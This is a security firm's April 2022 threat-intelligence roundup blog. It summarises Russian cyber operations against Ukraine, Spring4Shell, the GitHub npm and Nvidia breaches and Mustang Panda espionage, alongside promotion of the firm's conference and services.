April has been one of our busiest months yet, especially with breaches from Russian threat actors. Unfortunately, this is to be expected with an entire cyber-war going on at the same time as the war in Ukraine. In other more positive news, Integrity360 hosted it’s annual cyber security conference “Security First” in London in late April which I attended myself. I was very impressed with some of the new cyber tech being produced by our partners, such as Cynet and Varonis, not to mention the free merchandise 😉. From a team that is dedicated to threat hunting and detecting bad in the cyber-world, the industry move from signature-based detection to AI/behaviour-based detection (that both Cynet and Varonis do) is more than welcome. Standard anti-virus signatures, yara-rules and even sigma rules are not good enough by themselves because attackers are adopting the “living off the land” method more and more. The ever-increasing IT infrastructure size of organisations makes “living off the land” much more attractive to attackers because it is like the needle in a haystack analogy, although the needle is a piece of hay, and the haystack is growing.
In addition to the great partner vendors that attended our conference, we were also joined by Sir Alex Younger (former chief of MI6) who did a fantastic talk around why intelligence is fundamental to cyber security.. a real eye opener.
Although two months have passed since Russia invaded Ukraine, there has been a distinct lack of publicly successful Russian cyber attacks on Ukrainian entities. This has surprised many members of the security community; the common assumption prior to the invasion was that any physical incursion would be accompanied by significant offensive cyber activity. Analysts anticipated Russian attacks aimed at disrupting or destroying core Ukrainian infrastructure, in turn hindering Ukrainian retaliation.
There have been some notable Russian cyber-threat operations, mostly involved data wiping malware intended to destroy and delete files in targeted systems: “CaddyWiper”, “Industroyer”, “IsaacWiper”, and the “Hermetic Wizard” wormable malware, which spread the “HermeticWiper” malware, have all been observed targeting systems in Ukraine. Additionally, researchers reported that US intelligence attributed a cyber-attack on Ukrainian satellite systems to Russian military operators. However, these operations do not seem to have been the force multiplier Russia likely would have desired.
Three key hypotheses can be drawn from Russia’s apparent lack of significant cyber-victories in Ukraine:
1. Russia did not sufficiently prepare or organise its cyber resources
2. Ukraine adequately prepared itself for the attacks
3. The cyber-security community misjudged the utility and value of offensive cyber operations
However, it is likely that a combination of all three hypotheses explains the lack of Russian success: Russian cyber capabilities have been underused, Ukrainian defences were well prepared, and the security community overvalued cyber warfare in a modern battlespace.
Alongside the absence of successful government-led cyber-attacks, there has also been a distinct lack of cybercrime targeting Ukraine. Although some Russian-language cybercrime groups―such as “Conti” and “CoomingProject” ― have declared support for Russia, no significant increase in high-level cybercrime has been detected affecting Ukrainian entities.
On 04 Apr 2022, VMware released security updates for several products susceptible to the Spring4Shell RCE vulnerability affecting its cloud computing and virtualization products. Since then, the flaw has reportedly been actively exploited. For product versions that lack an official patch, VMware has offered workarounds as temporary solutions. Spring4Shell has a severity rating of 9.8 and can be exploited without authentication, meaning that threat actors with access to vulnerable applications can execute arbitrary commands and gain control of a system.
On 12 Apr 2022, security researchers identified an attempt by the Russian “Sandworm” advanced persistent threat (APT) group to disrupt a Ukrainian energy provider with the “Industroyer” (aka CrashOverride) malware. The recently used version of Industroyer was customized to target high-voltage electrical substations. Destructive malware was used thereafter, such as “CaddyWiper”, “Orcshred”, “Soloshred”, and “Awfulshred”, to erase traces of the attack. Additional tools included the PowerGap PowerShell script and the Impacket Python tool for downloading payloads and remotely execute code.
At the end of February 2022, a Ukrainian security researcher leaked more than 60,000 internal messages sent by members of the prolific, Russian-speaking ransomware group “Conti”. The messages provided invaluable insight into the group’s structure and TTPs, although making sense of such a large data set presented challenges.
On 12 Apr 2022, the security team of online software and code repository host GitHub launched an investigation after attackers reportedly gained unauthorized access to GitHub’s npm production infrastructure. The unidentified perpetrators allegedly stole and used an Amazon Web Services application programming interface (API) key, probably with the aim to steal sensitive and proprietary information.
On 27 Apr 2022, security researchers reported that the People’s Republic of China-associated APT group “Mustang Panda” (aka Bronze President) has targeted Russian military officials with cyber espionage. Using sophisticated malware, the attackers likely intended to enhance intelligence-collection efforts related to Russia. This espionage campaign marks a departure from previously reported Mustang Panda targeting, which typically focused on non-governmental organizations in the US and Europe.
On 5 March 2022, security researchers reported that a code signing certificate was among the data/documents stolen and leaked online after a cyber-attack against multinational chip and graphics processing unit (GPU) manufacturer Nvidia. The attack, purportedly conducted by the “Lapsus$” threat group, included more than 70,000 employee email addresses, and hashed passwords for NT LAN Manager. Code signing certificates are used to digitally sign and verify code; stolen certificates could be used to deceive victims into thinking that malicious code is legitimate and safe to receive and execute.
The Integrity360 hosted cyber security conference “Security First” was a success in the UK in April. Looking forward to May, we have our Dublin-based version of the conference for our Irish-based customers. The Irish CTR members are more than looking forward to this, especially as Sir Alex Younger is repeating his talk there too.
The Threat Intel Roundup was prepared by Integrity360 summarising threat news as we observe it, current at the date of publishing. It should not be considered to be legal, consulting or any other professional advice. Any recommendations should be considered in the context of your own organisation. Integrity360 does not take any political stance in the information that we share. Moreover, the opinions expressed may not necessarily be the views of Integrity360.
If you’d like more detailed threat intelligence news, Integrity360 offers this as part of our security monitoring managed services.
We also offer a tailored threat intelligence monitoring service for your organisation that actively monitors for threat actors and campaigns of direct relevance to your organisation, brand damage, copycat & spoofed domains, credential leakage and dark web monitoring.
Join us in Dublin or London for the Security First 2022 conference. We'll be bringing together industry professionals and specialist experts to discuss the latest cyber security trends and offer actionable advice on preparing your business to put security first in 2022.